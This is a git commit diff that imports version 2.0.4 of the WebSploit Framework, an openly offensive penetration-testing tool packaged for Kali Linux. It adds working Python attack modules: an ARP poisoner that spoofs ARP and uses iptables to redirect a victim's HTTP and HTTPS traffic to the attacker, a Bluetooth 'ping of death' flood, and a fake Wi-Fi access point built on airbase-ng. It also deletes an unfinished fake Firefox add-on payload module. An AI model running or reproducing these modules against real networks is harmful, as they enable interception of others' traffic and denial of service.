Imported Upstream version 2.0.4 upstream/2.0.4
authorMati Aharoni (Kali Linux Developer) <muts@kali.org>
Sun, 11 Aug 2013 17:34:01 +0000 (13:34 -0400)
committerMati Aharoni (Kali Linux Developer) <muts@kali.org>
Sun, 11 Aug 2013 17:34:01 +0000 (13:34 -0400)
13 files changed:
.project [new file with mode: 0644]
.pydevproject [new file with mode: 0644]
LICENCE
README.txt
core/header.py
core/menu.py
core/modules_database.py
core/upgrade.py [changed mode: 0755->0644]
modules/arp_poisoner.py [new file with mode: 0644]
modules/bluetooth_pod.py [new file with mode: 0644]
modules/fake_addon.py [deleted file]
modules/wifi_honeypot.py [new file with mode: 0644]
websploit

diff --git a/.project b/.project
new file mode 100644 (file)
index 0000000..8aeacdd
--- /dev/null
+++ b/.project
@@ -0,0 +1,17 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<projectDescription>
+       <name>wsf</name>
+       <comment></comment>
+       <projects>
+       </projects>
+       <buildSpec>
+               <buildCommand>
+                       <name>org.python.pydev.PyDevBuilder</name>
+                       <arguments>
+                       </arguments>
+               </buildCommand>
+       </buildSpec>
+       <natures>
+               <nature>org.python.pydev.pythonNature</nature>
+       </natures>
+</projectDescription>
diff --git a/.pydevproject b/.pydevproject
new file mode 100644 (file)
index 0000000..b5da97c
--- /dev/null
@@ -0,0 +1,10 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<?eclipse-pydev version="1.0"?>
+
+<pydev_project>
+<pydev_pathproperty name="org.python.pydev.PROJECT_SOURCE_PATH">
+<path>/wsf</path>
+</pydev_pathproperty>
+<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.7</pydev_property>
+<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
+</pydev_project>
diff --git a/LICENCE b/LICENCE
index b615afe..cdd8a50 100644 (file)
--- a/LICENCE
+++ b/LICENCE
@@ -5,5 +5,6 @@ Licence For:
 BackBox
 BackTrack
 BlackBuntu
+Kali
 And All Hacking And Security Distro
 ------------------
index a90b6c5..b0e106f 100644 (file)
@@ -21,11 +21,14 @@ Supported Attack :
 #      [+]MFOD Attack - Middle Finger Of Doom Attack
 #      [+]Java Applet Attack Vector 
 #      [+]ARP DOS - ARP Cache Denial Of Service Attack With Random MAC
+#       [+]ARP Poisoner
 #      [+]Directory Scanner - Scan Target Directorys
 #      [+]Apache US - Scan Apache users
 #      [+]PHPMyAdmin - Scan PHPMyAdmin Login Page
 #      [+]Web Killer - Using From The TCPKill For Down Your WebSite On Network
 #      [+]Fake AP - Fake Access Point
 #      [+]FakeUpdate - Fake update attack 
-#   [+]Wifi Jammer - Wifi Jammer Attack
-#   [+]Wifi Dos - Wifi Dos RQ Attack
+#       [+]Wifi Jammer - Wifi Jammer Attack
+#       [+]Wifi Dos - Wifi Dos RQ Attack
+#       [+]Wifi Honeypot
+#       [+]Bluetooth POD Attack
index ee0b8e0..229a216 100644 (file)
@@ -46,4 +46,5 @@ def main_header():
        if hdr_num ==3:
                print header_3
 
+
        
index 1c289a9..ec73393 100644 (file)
@@ -10,8 +10,8 @@ def main_info():
        ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
        print ""
        print "\t\t--=" + ston + "WebSploit FrameWork"
-       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.3" + wcolors.color.ENDC
-       print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "CyberTron" + wcolors.color.ENDC
-       print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "16" + wcolors.color.ENDC
-       print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.3-116 9.10.2012" + wcolors.color.ENDC + "]"
+       print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.4" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "MegaTron" + wcolors.color.ENDC
+       print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "19" + wcolors.color.ENDC
+       print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.4-111 13.6.2013" + wcolors.color.ENDC + "]"
        print "\n\n"
index 9d637ea..411c9e0 100644 (file)
@@ -24,6 +24,7 @@ def modules_database():
     print "network/webkiller\t\tTCP Kill Attack"
     print "network/fakeupdate\t\tFake Update Attack Using DNS Spoof"
     print "network/fakeap\t\t\tFake Access Point"
+    print "network/arp_poisoner\t\tArp Poisoner"
     print "\n"
     print (wcolors.color.BLUE + "Exploit Modules\t\t\tDescription" + wcolors.color.ENDC)
     print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
@@ -31,8 +32,10 @@ def modules_database():
     print "exploit/browser_autopwn\t\tMetasploit Browser Autopwn Service"
     print "exploit/java_applet\t\tJava Applet Attack (Using HTML)"
     print "\n"
-    print (wcolors.color.BLUE + "Wireless Modules\t\tDescription" + wcolors.color.ENDC)
+    print (wcolors.color.BLUE + "Wireless / Bluetooth Modules\t\tDescription" + wcolors.color.ENDC)
     print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
     print "wifi/wifi_jammer\t\tWifi Jammer"
     print "wifi/wifi_dos\t\t\tWifi Dos Attack"
+    print "wifi/wifi_honeypot\t\tWireless Honeypot(Fake AP)"
+    print "bluetooth/bluetooth_pod\t\tBluetooth Ping Of Death Attack"
     print "\n"
old mode 100755 (executable)
new mode 100644 (file)
index 8b7a75e..a16c637
@@ -14,7 +14,7 @@ def upgrade():
     try:
         cu = urllib.urlopen("http://sourceforge.net/projects/websploit/files/")
         res = cu.read()
-        if 'WebSploit Framework V.2.0.4' in res:
+        if 'WebSploit Framework V.2.0.5' in res:
             print(wcolors.color.GREEN + "[*]New Version Available")
             sleep(2)
             print("[*]Download Latest Version : https://sourceforge.net/projects/websploit/files/latest/download?source=files" + wcolors.color.ENDC)
diff --git a/modules/arp_poisoner.py b/modules/arp_poisoner.py
new file mode 100644 (file)
index 0000000..c8a57e3
--- /dev/null
@@ -0,0 +1,101 @@
+#!/usr/bin/env python
+#
+# WebSploit Framework ARP Poisoner module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+
+import os
+import subprocess
+from core import help
+from core import wcolors
+from scapy.all import *
+from time import sleep
+
+options = ["eth0", "192.168.1.1", "192.168.1.2", "192.168.1.3"]
+def arp_poisoner():
+    try:
+        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
+        line_1 += ":"
+        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP_Poisoner" + wcolors.color.ENDC
+        line_1 += " > "
+        com = raw_input(line_1)
+        com = com.lower()
+        if com[0:13] == 'set interface':
+            options[0] = com[14:20]
+            print "INTERFACE => ",options[0]
+            arp_poisoner()
+        elif com[0:10] == 'set router':
+            options[1] = com[11:26]
+            print "ROUTER => ", options[1]
+            arp_poisoner()
+        elif com[0:10] == 'set target':
+            options[2] = com[11:26]
+            print "TARGET => ", options[2]
+            arp_poisoner()
+        elif com[0:9] =='set lhost':
+            options[3] = com[10:25]
+            print "LHOST => ", options[3]
+            arp_poisoner()
+        elif com[0:2] =='os':
+            os.system(com[3:])
+            arp_poisoner()
+        elif com[0:4] =='help':
+            help.help()
+            arp_poisoner()
+        elif com[0:4] =='back':
+            pass
+        elif com[0:12] =='show options':
+            print ""
+            print "Options\t\t Value\t\t\t\t RQ\t Description"
+            print "---------\t--------------\t\t\t----\t--------------"
+            print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
+            print "ROUTER\t\t"+options[1]+"\t\t\tyes\tRouter IP Address"
+            print "TARGET\t\t"+options[2]+"\t\t\tyes\tTarget IP Address"
+            print "LHOST\t\t"+options[3]+"\t\t\tyes\tLocal IP Address"
+            print ""
+            arp_poisoner()
+        elif com[0:3] =='run':
+            print (wcolors.color.BLUE + "[*]Setting Up ..." + wcolors.color.ENDC)
+            exec1 = "echo 1 > /proc/sys/net/ipv4/ip_forward"
+            exec2 = "echo 0 > /proc/sys/net/ipv4/conf/%s/send_redirects" % (options[0])
+            exec3 = "iptables --flush"
+            exec4 = "iptables --zero"
+            exec5 = "iptables --delete-chain"
+            exec6 = "iptables -F -t nat"
+            exec7 = "iptables --append FORWARD --in-interface %s --jump ACCEPT" % (options[0])
+            exec8 = "iptables --table nat --append POSTROUTING --out-interface %s --jump MASQUERADE" % (options[0])
+            exec9 = "iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination %s" % (options[3])
+            exec10= "iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination %s" % (options[3])
+            print(wcolors.color.BLUE + "[*]IP Forwarding ... " + wcolors.color.ENDC),
+            subprocess.Popen(exec1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            sleep(0.5)
+            print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
+            print(wcolors.color.BLUE + "[*]Configuring Iptables ... " + wcolors.color.ENDC),
+            subprocess.Popen(exec3, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec4, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec5, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec6, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec7, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec8, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            sleep(0.5)
+            print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
+            print(wcolors.color.BLUE + "[*]Redirect Traffic on %s ... " + wcolors.color.ENDC) % (options[3]),
+            subprocess.Popen(exec9, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            subprocess.Popen(exec10, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            sleep(0.5)
+            print(wcolors.color.GREEN + "[OK]" + wcolors.color.ENDC)
+            sleep(1)
+            print(wcolors.color.BLUE + "[*]ARP Poisoning Has Been Started ..." + wcolors.color.ENDC)
+            packet = ARP()
+            packet.psrc = options[1]
+            packet.pdst = options[2]
+            try:
+                while 1:
+                    send(packet, verbose=0)
+                    sleep(50)
+            except:
+                print (wcolors.color.RED + "[!]Something Wrong , Cannot Send Packet!")
+                pass
+    except(KeyboardInterrupt):
+        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
diff --git a/modules/bluetooth_pod.py b/modules/bluetooth_pod.py
new file mode 100644 (file)
index 0000000..4fd59be
--- /dev/null
@@ -0,0 +1,69 @@
+#!/usr/bin/env python
+#
+# WebSploit Framework Bluetooth Ping Of Death module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+
+import os
+import subprocess
+from time import sleep
+from core import help
+from core import wcolors
+
+options = ["hci0", "", "600"]
+def bluetooth_pod():
+    try:
+        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
+        line_1 += ":"
+        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Bluetooth_POD" + wcolors.color.ENDC
+        line_1 += " > "
+        com = raw_input(line_1)
+        com = com.lower()
+        if com[0:13] =='set interface':
+            options[0] = com[14:19]
+            print "interface => ", options[0]
+            bluetooth_pod()
+        elif com[0:10] =='set bdaddr':
+            options[1] = com[11:28]
+            print "bdaddr => ", options[1]
+            bluetooth_pod()
+        elif com[0:8] =='set size':
+            options[2] = com[9:12]
+            print "size => ", options[2]
+            bluetooth_pod()
+        elif com[0:2] =='os':
+            os.system(com[3:])
+            bluetooth_pod()
+        elif com[0:4] =='help':
+            help.help()
+            bluetooth_pod()
+        elif com[0:4] =='back':
+            pass
+        elif com[0:12] =='show options':
+            print ""
+            print "Options\t\t Value\t\t\t\t RQ\t Description"
+            print "---------\t--------------\t\t\t----\t--------------"
+            print "interface\t"+options[0]+"\t\t\t\tyes\tBluetooth Interface Name"
+            print "bdaddr\t\t"+options[1]+"\t\t\t\tyes\tTarget Bluetooth Address"
+            print "size\t\t"+options[2]+"\t\t\t\tyes\tSize of packets (Default 600)"
+            print ""
+            bluetooth_pod()
+        elif com[0:4] =='scan':
+            os.system("hcitool scan")
+            print ""
+            bluetooth_pod()
+        elif com[0:3] =='run':
+            print(wcolors.color.BLUE + "[*]Bluetooth Ping Of Death Attack Started ..." + wcolors.color.ENDC)
+            try:
+                for i in range(1, 10000):
+                    xterm_1 = "xterm -e l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
+                    os.system(xterm_1)
+                    sleep(3)
+            except(KeyboardInterrupt, OSError):
+                print(wcolors.color.RED + "[!] Something Is Wrong ! Websploit Bluetooth_POD Module Exit." + wcolors.color.ENDC)
+            bluetooth_pod()
+        else:
+            print "Wrong Command => ", com
+            bluetooth_pod()
+    except(KeyboardInterrupt):
+        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
diff --git a/modules/fake_addon.py b/modules/fake_addon.py
deleted file mode 100644 (file)
index 042169a..0000000
+++ /dev/null
@@ -1,62 +0,0 @@
-#!/usr/bin/env python
-#
-# WebSploit Framework Firefox Fake Addon module
-# Created By 0x0ptim0us (Fardin Allahverdinazhand) | Mikili (Mikail Skandary)
-# Email : 0x0ptim0us@Gmail.Com | Mikili.land@Gmail.Com
-
-import os
-import subprocess
-from time import sleep
-from core import help
-from core import wcolors
-
-options = ["eth0", "192.168.1.1", "0"]
-
-def fake_addon():
-    try:
-        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
-        line_1 += ":"
-        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Fake_Addon" + wcolors.color.ENDC
-        line_1 += " > "
-        com = raw_input(line_1)
-        com = com.lower()
-        if com[0:13] =='set interface':
-            options[0] = com[14:20]
-            print "INTERFACE => ", options[0]
-            fake_addone()
-        elif com[0:9] =='set lhost':
-            options[1] = com[10:25]
-            print "LHOST => ", options[1]
-            fake_addon()
-        elif com[0:10] =='set target':
-            options[2] = com[11:12]
-            print "TARGET => ", options[2]
-            fake_addon()
-        elif com[0:2] =='os':
-            os.system(com[3:])
-            fake_addon()
-        elif com[0:4] =='help':
-            help.help()
-            fake_addon()
-        elif com[0:4] =='back':
-            pass
-        elif com[0:12] =='show options':
-            print ""
-            print "Options\t\t Value\t\t\t\t RQ\t Description"
-            print "---------\t--------------\t\t\t----\t--------------"
-            print "INTERFACE\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
-            print "LHOST\t\t"+options[1]+"\t\t\tyes\tLocal IP Address"
-            print "TARGET\t\t"+options[2]+"\t\t\t\tyes\tTarget ID (Select From List)"
-            print "\n"
-            print "Targets List:\n"
-            print "ID\t Description"
-            print "---\t-------------"
-            print "0\tGeneric (Java Payload)"
-            print "1\tWindows x86 (Native Payload)"
-            print "2\tLinux x86 (Native Payload)"
-            print "3\tMac OS X PPC (Native Payload)"
-            print "4\tMac OS X x86 (Native Payload)"
-            print "\n"
-            fale_addon()
-        elif com[0:3] =='run':
-            
\ No newline at end of file
diff --git a/modules/wifi_honeypot.py b/modules/wifi_honeypot.py
new file mode 100644 (file)
index 0000000..6100fad
--- /dev/null
@@ -0,0 +1,109 @@
+#!/usr/bin/env python
+#
+# WebSploit Framework Wifi Honeypot (Fake Access Point) module
+# Created By 0x0ptim0us (Fardin Allahverdinazhand)
+# Email : 0x0ptim0us@Gmail.Com
+import os
+import subprocess
+from time import sleep
+from core import help
+from core import wcolors
+
+options = ["wlan0", "FreeNet", "9", "a1:a2:a3:a4:a5:a6", "/home/wh_logs.txt", "mon0", "1"]
+
+def wifi_honeypot():
+    try:
+        line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
+        line_1 += ":"
+        line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Honeypot" + wcolors.color.ENDC
+        line_1 += " > "
+        com = raw_input(line_1)
+        com = com.lower()
+        if com[0:13] == 'set interface':
+            options[0] = com[14:20]
+            print "INTERFACE => ", options[0]
+            wifi_honeypot()
+        elif com[0:9] == 'set essid':
+            options[1] = com[10:]
+            print "ESSID => ", options[1]
+            wifi_honeypot()
+        elif com[0:11] == 'set channel':
+            options[2] = com[12:13]
+            print "CHANNEL => ", options[2]
+            wifi_honeypot()
+        elif com[0:7] == 'set mac':
+            options[3] = com[8:25]
+            print "MAC => ", options[3]
+            wifi_honeypot()
+        elif com[0:10] == 'set output':
+            options[4] = com[11:]
+            print "OUTPUT => ", options[4]
+            wifi_honeypot()
+        elif com[0:7] == 'set mon':
+            options[5] = com[8:12]
+            print "MON => ", options[5]
+            wifi_honeypot()
+        elif com[0:11] =='set encrypt':
+            options[6] = com[12:13]
+            print "ENCRYPT => ", options[6]
+            wifi_honeypot()
+        elif com[0:2] =='os':
+            os.system(com[3:])
+            wifi_honeypot()
+        elif com[0:4] =='help':
+            help.help()
+            wifi_honeypot()
+        elif com[0:4] =='back':
+            pass
+        elif com[0:12] =='show options':
+            print ""
+            print "Options\t\t Value\t\t\t\t RQ\t Description"
+            print "---------\t--------------\t\t\t----\t--------------"
+            print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
+            print "essid\t\t"+options[1]+"\t\t\t\tyes\tFakeAP Essid"
+            print "channel\t\t"+options[2]+"\t\t\t\tyes\tFakeAP Channel"
+            print "mac\t\t"+options[3]+"\t\tyes\tFakeAP Mac Address"
+            print "output\t\t"+options[4]+"\t\tyes\tLog File Location"
+            print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mode(default)"
+            print "encrypt\t\t"+options[6]+"\t\t\t\tyes\tType Of Encryptions"
+            print "\n"
+            print "Numbers\t\t Encryptions"
+            print "-------\t\t--------------"
+            print "1\t\t Unencrypted"
+            print "2\t\t wep"
+            print "3\t\t wpa"
+            print "4\t\t wpa2"
+            print ""
+            wifi_honeypot()
+        elif com[0:3] == 'run':
+            comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
+            comm2= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
+            comm3= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -z 2 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
+            comm4= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -Z 4 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
+            monit_mod_start= "airmon-ng start %s" %(options[0])
+            print(wcolors.color.GREEN+"[*]Enable monitor mode on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
+            subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
+            print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
+            print(wcolors.color.GREEN+"[*]Creating Fake Access Point ..."+wcolors.color.ENDC),
+            if options[6]=='1':
+                os.system(comm1)
+            elif options[6]=='2':
+                os.system(comm2)
+            elif options[6]=='3':
+                os.system(comm3)
+            elif options[6]=='4':
+                os.system(comm4)
+            sleep(2)
+            print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
+            wifi_honeypot()
+        elif com[0:4]=='stop':
+            monit_mod_stop="xterm -e airmon-ng stop %s"%(options[5])
+            os.system("killall xterm")
+            os.system("killall airbase-ng")
+            os.system(monit_mod_stop)
+            wifi_honeypot()
+        else:
+            print "Wrong Command => ", com
+            wifi_honeypot()
+    except(KeyboardInterrupt):
+        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
index 79a6ae5..b075ed3 100755 (executable)
--- a/websploit
+++ b/websploit
@@ -50,11 +50,14 @@ from modules import autopwn
 from modules import mitm
 from modules import mlitm
 from modules import mfod
+from modules import arp_poisoner
 from modules import webkiller
 from modules import brow_autopwn
 from modules import java_applet
 from modules import wifi_jammer
 from modules import wifi_dos
+from modules import wifi_honeypot
+from modules import bluetooth_pod
 from modules.fakeap import fake_ap
 from modules.fakeupdate import fakeupdate
 
@@ -103,6 +106,9 @@ def main():
             elif terminal[4:18] =='network/fakeap':
                 fake_ap.fake_sts()
                 main()
+            elif terminal[4:24] =='network/arp_poisoner':
+                arp_poisoner.arp_poisoner()
+                main()
             elif terminal[4:22] =='network/fakeupdate':
                 fakeupdate.fakeupdate()
                 main()
@@ -112,6 +118,12 @@ def main():
             elif terminal[4:17] =='wifi/wifi_dos':
                 wifi_dos.wifi_dos()
                 main()
+            elif terminal[4:22] =='wifi/wifi_honeypot':
+                wifi_honeypot.wifi_honeypot()
+                main()
+            elif terminal[4:27] =='bluetooth/bluetooth_pod':
+                bluetooth_pod.bluetooth_pod()
+                main()
         elif terminal[0:12] == 'show modules':
             modules_database.modules_database()
             main()